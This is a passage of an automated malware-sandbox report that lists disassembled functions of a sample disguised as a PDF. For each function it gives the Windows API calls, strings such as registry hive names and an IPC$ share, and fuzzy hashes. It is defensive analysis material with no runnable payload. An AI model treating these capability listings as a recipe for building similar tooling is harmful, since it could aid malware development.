                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0038D137
                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0038D15C
                                                    • _memset.LIBCMT ref: 0038D17B
                                                    • _wcsncpy.LIBCMT ref: 0038D1B7
                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0038D1EC
                                                    • CloseHandle.KERNEL32(00000000), ref: 0038D1F7
                                                    • RemoveDirectoryW.KERNEL32(?), ref: 0038D200
                                                    • CloseHandle.KERNEL32(00000000), ref: 0038D20A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                    • String ID: :$\$\??\%s
                                                    • API String ID: 2733774712-3457252023
                                                    • Opcode ID: c29a72df4866b2cbe0bcd2b48e7f3abfa8bf2a94ab7c94962b3827da28a769a0
                                                    • Instruction ID: 08d7ff3aceab59db7950d217cadac2e0f1cccbba81460fc2d327d4493d3b0300
                                                    • Opcode Fuzzy Hash: c29a72df4866b2cbe0bcd2b48e7f3abfa8bf2a94ab7c94962b3827da28a769a0
                                                    • Instruction Fuzzy Hash: 8831B476500209ABDB22EFA0DC49FEB77BDEF88740F1040B5F509D61A0E770E6448B24
                                                    Function 003787CD Relevance: 22.7, APIs: 15, Instructions: 210COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                    • String ID:
                                                    • API String ID: 884005220-0
                                                    • Opcode ID: e3fb4a53a3671925c33f2a57d1059f33a0c0b624360ab89b5dcae087f4cf66e6
                                                    • Instruction ID: 65429ee60e9032eda8825d70884ec8211f99b67c1ceecaa9e5b7544626d7ecbe
                                                    • Opcode Fuzzy Hash: e3fb4a53a3671925c33f2a57d1059f33a0c0b624360ab89b5dcae087f4cf66e6
                                                    • Instruction Fuzzy Hash: 2A61F232A80215EFDB335F24DD4AB7977A8AF01360F25C126E809EF185DF39C94087A6
                                                    Function 003AE731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 003AE754
                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 003AE76B
                                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 003AE776
                                                    • CloseHandle.KERNEL32(00000000), ref: 003AE783
                                                    • GlobalLock.KERNEL32(00000000), ref: 003AE78C
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 003AE79B
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 003AE7A4
                                                    • CloseHandle.KERNEL32(00000000), ref: 003AE7AB
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 003AE7BC
                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,003CD9BC,?), ref: 003AE7D5
                                                    • GlobalFree.KERNEL32(00000000), ref: 003AE7E5
                                                    • GetObjectW.GDI32(?,00000018,000000FF), ref: 003AE809
                                                    • CopyImage.USER32(?,00000000,?,?,00002000), ref: 003AE834
                                                    • DeleteObject.GDI32(00000000), ref: 003AE85C
                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 003AE872
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                    • String ID:
                                                    • API String ID: 3840717409-0
                                                    • Opcode ID: 90e742fd12fe5f9a37dd3013e9b5857326f799871122e257e25b595b1921d990
                                                    • Instruction ID: c867fe0c6de31c15ee0560f62a82c1a845bfb9b11ae441fa9b6a0c81145e7567
                                                    • Opcode Fuzzy Hash: 90e742fd12fe5f9a37dd3013e9b5857326f799871122e257e25b595b1921d990
                                                    • Instruction Fuzzy Hash: 8A413A75600204FFDB129F65DC48EAABBBCEF8AB11F104468F905D7260D735AD41DB60
                                                    Function 003905F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __wsplitpath.LIBCMT ref: 0039076F
                                                    • _wcscat.LIBCMT ref: 00390787
                                                    • _wcscat.LIBCMT ref: 00390799
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003907AE
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 003907C2
                                                    • GetFileAttributesW.KERNEL32(?), ref: 003907DA
                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 003907F4
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00390806
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                    • String ID: *.*
                                                    • API String ID: 34673085-438819550
                                                    • Opcode ID: e1dfc8075b57e00cb3e221200094a958411294bf73db95857632263fa1fc0a67
                                                    • Instruction ID: 2fb303f2eafcf9d8cc0782d8271bdd9b6a428813674dab2c7848619cf5a032eb
                                                    • Opcode Fuzzy Hash: e1dfc8075b57e00cb3e221200094a958411294bf73db95857632263fa1fc0a67
                                                    • Instruction Fuzzy Hash: C5819F726043019FCF2ADF64C84596EB7E8EF89304F15882EF989DB251E730E9558B92
                                                    Function 003AEEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003AEF3B
                                                    • GetFocus.USER32 ref: 003AEF4B
                                                    • GetDlgCtrlID.USER32(00000000), ref: 003AEF56
                                                    • _memset.LIBCMT ref: 003AF081
                                                    • GetMenuItemInfoW.USER32 ref: 003AF0AC
                                                    • GetMenuItemCount.USER32(00000000), ref: 003AF0CC
                                                    • GetMenuItemID.USER32(?,00000000), ref: 003AF0DF
                                                    • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 003AF113
                                                    • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 003AF15B
                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003AF193
                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 003AF1C8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                    • String ID: 0
                                                    • API String ID: 1296962147-4108050209
                                                    • Opcode ID: a328e7840c04e329253ae2513350364fe774f4fd6f308a207fff6c489d5bce45
                                                    • Instruction ID: c118fa3f28f5c6f248c1af544dc5339da8f0344686dc9b301d4de187874a10a6
                                                    • Opcode Fuzzy Hash: a328e7840c04e329253ae2513350364fe774f4fd6f308a207fff6c489d5bce45
                                                    • Instruction Fuzzy Hash: 7B817B71608301AFDB22CF54CC84E6BBBE9FB8A314F01492EF99997291D771D905CB92
                                                    Function 0037A867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0037ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0037ABD7
                                                      • Part of subcall function 0037ABBB: GetLastError.KERNEL32(?,0037A69F,?,?,?), ref: 0037ABE1
                                                      • Part of subcall function 0037ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0037A69F,?,?,?), ref: 0037ABF0
                                                      • Part of subcall function 0037ABBB: HeapAlloc.KERNEL32(00000000,?,0037A69F,?,?,?), ref: 0037ABF7
                                                      • Part of subcall function 0037ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0037AC0E
                                                      • Part of subcall function 0037AC56: GetProcessHeap.KERNEL32(00000008,0037A6B5,00000000,00000000,?,0037A6B5,?), ref: 0037AC62
                                                      • Part of subcall function 0037AC56: HeapAlloc.KERNEL32(00000000,?,0037A6B5,?), ref: 0037AC69
                                                      • Part of subcall function 0037AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0037A6B5,?), ref: 0037AC7A
                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0037A8CB
                                                    • _memset.LIBCMT ref: 0037A8E0
                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0037A8FF
                                                    • GetLengthSid.ADVAPI32(?), ref: 0037A910
                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 0037A94D
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0037A969
                                                    • GetLengthSid.ADVAPI32(?), ref: 0037A986
                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0037A995
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0037A99C
                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0037A9BD
                                                    • CopySid.ADVAPI32(00000000), ref: 0037A9C4
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0037A9F5
                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0037AA1B
                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0037AA2F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                    • String ID:
                                                    • API String ID: 3996160137-0
                                                    • Opcode ID: 88be91a9b8f1059385e12bb0b41b0701e793e30de096489c723642fade13c0af
                                                    • Instruction ID: dc4b1dd3540a7bd6bbb80fea157af3c986e89ea2203c1110344ed7a22aba5386
                                                    • Opcode Fuzzy Hash: 88be91a9b8f1059385e12bb0b41b0701e793e30de096489c723642fade13c0af
                                                    • Instruction Fuzzy Hash: 01514B71900619ABDF22DF94DD45EEEBB79FF48300F048129F915EB290D7389A15CB61
                                                    Function 00399DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 00399E36
                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00399E42
                                                    • CreateCompatibleDC.GDI32(?), ref: 00399E4E
                                                    • SelectObject.GDI32(00000000,?), ref: 00399E5B
                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00399EAF
                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00399EEB
                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00399F0F
                                                    • SelectObject.GDI32(00000006,?), ref: 00399F17
                                                    • DeleteObject.GDI32(?), ref: 00399F20
                                                    • DeleteDC.GDI32(00000006), ref: 00399F27
                                                    • ReleaseDC.USER32(00000000,?), ref: 00399F32
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                    • String ID: (
                                                    • API String ID: 2598888154-3887548279
                                                    • Opcode ID: 9d7e584e38d5cf866caa2fbb09cacf2337bd1f1df93bffe0626ea0f716d7b2be
                                                    • Instruction ID: e7ee554705653414dc6703bc4cc3d47c959ec6daee2e9f7caddf96562238a821
                                                    • Opcode Fuzzy Hash: 9d7e584e38d5cf866caa2fbb09cacf2337bd1f1df93bffe0626ea0f716d7b2be
                                                    • Instruction Fuzzy Hash: 31514B75900309EFCB16CFA9DC85EAEBBB9EF48310F14842EF99997210D731A941CB90
                                                    Function 0038CC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: LoadString__swprintf_wprintf
                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                    • API String ID: 2889450990-2391861430
                                                    • Opcode ID: 651301d5c199e347d3d8a5daf0e4bc9c1091f49761d9a1612aec7794007d0ec2
                                                    • Instruction ID: c72edb8c7b987e31140ad957e8533c99dec361aa45a7b5a688b16ef13ad2dfeb
                                                    • Opcode Fuzzy Hash: 651301d5c199e347d3d8a5daf0e4bc9c1091f49761d9a1612aec7794007d0ec2
                                                    • Instruction Fuzzy Hash: 91515C72800209BBCF16FBA0CD46EEEB7B8AF04344F1041A5F5057A1A2EB716F59DB61
                                                    Function 0038CA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: LoadString__swprintf_wprintf
                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                    • API String ID: 2889450990-3420473620
                                                    • Opcode ID: b435ab121bf195c83dfea01c53dbe362f708f815407d7f4333e63afa45e46d5e
                                                    • Instruction ID: e30765386f17c2796baeaa699d2f41ba88f2b2c5dd2e6766fbd526f3e7145e1e
                                                    • Opcode Fuzzy Hash: b435ab121bf195c83dfea01c53dbe362f708f815407d7f4333e63afa45e46d5e
                                                    • Instruction Fuzzy Hash: F8514B72900609AACF17FBA0DE46EEEB7B8AF04340F104065F5057A0A2EB756F59DB61
                                                    Function 003A3C06 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 109COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,003A2BB5,?,?), ref: 003A3C1D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID: $E?$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                    • API String ID: 3964851224-1016100088
                                                    • Opcode ID: 3366fb4f8b9b295463a4911f8482509a8074cb676cf06a159f4400b491dd8be6
                                                    • Instruction ID: f8e90384901d19ae562fa84e83bdfda071a3fa850a44779aeb92a29af93f0c06
                                                    • Opcode Fuzzy Hash: 3366fb4f8b9b295463a4911f8482509a8074cb676cf06a159f4400b491dd8be6
                                                    • Instruction Fuzzy Hash: F0413B3411024A8BCF07EF14D851AEB3365EF23340F514865FC956F2A2EB70EA4ACB50
                                                    Function 003855BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 003855D7
                                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00385664
                                                    • GetMenuItemCount.USER32(00401708), ref: 003856ED
                                                    • DeleteMenu.USER32(00401708,00000005,00000000,000000F5,?,?), ref: 0038577D
                                                    • DeleteMenu.USER32(00401708,00000004,00000000), ref: 00385785
                                                    • DeleteMenu.USER32(00401708,00000006,00000000), ref: 0038578D
                                                    • DeleteMenu.USER32(00401708,00000003,00000000), ref: 00385795
                                                    • GetMenuItemCount.USER32(00401708), ref: 0038579D
                                                    • SetMenuItemInfoW.USER32(00401708,00000004,00000000,00000030), ref: 003857D3
                                                    • GetCursorPos.USER32(?), ref: 003857DD
                                                    • SetForegroundWindow.USER32(00000000), ref: 003857E6
                                                    • TrackPopupMenuEx.USER32(00401708,00000000,?,00000000,00000000,00000000), ref: 003857F9
                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00385805
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                    • String ID:
                                                    • API String ID: 3993528054-0
                                                    • Opcode ID: ae6158f5b0c50d53bc6756faa5ff3960c67d445c9a00d4736c6e9d669ffdd2c4
                                                    • Instruction ID: 5d43ec4da994b42506c844ce202a057e3678ef3da98df65cc2214e961a418ae8
                                                    • Opcode Fuzzy Hash: ae6158f5b0c50d53bc6756faa5ff3960c67d445c9a00d4736c6e9d669ffdd2c4
                                                    • Instruction Fuzzy Hash: 5B710330640B05BFEB23AB54DC49FAABF69FF00368F644256F618AA1E0D7716C10DB90
                                                    Function 0037A14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 0037A1DC
                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0037A211
                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0037A22D
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0037A249
                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0037A273
                                                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0037A29B
                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0037A2A6
                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0037A2AB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                    • API String ID: 1687751970-22481851
                                                    • Opcode ID: ed32b95bf91179f4a6f67272b8086650fa3d1b71136e35f416067af86b12da7a
                                                    • Instruction ID: d45a8476629a2115f15b49067827afa6332355aa2cd5ba1c1bb555689f0b1da9
                                                    • Opcode Fuzzy Hash: ed32b95bf91179f4a6f67272b8086650fa3d1b71136e35f416067af86b12da7a
                                                    • Instruction Fuzzy Hash: 8741F476C10629ABDF22EBA4DC85DEEB7B8FF04340F014429F905BB161EA74AE05CB51
                                                    Function 003867E9 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __swprintf.LIBCMT ref: 003867FD
                                                    • __swprintf.LIBCMT ref: 0038680A
                                                      • Part of subcall function 0036172B: __woutput_l.LIBCMT ref: 00361784
                                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 00386834
                                                    • LoadResource.KERNEL32(?,00000000), ref: 00386840
                                                    • LockResource.KERNEL32(00000000), ref: 0038684D
                                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 0038686D
                                                    • LoadResource.KERNEL32(?,00000000), ref: 0038687F
                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0038688E
                                                    • LockResource.KERNEL32(?), ref: 0038689A
                                                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 003868F9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
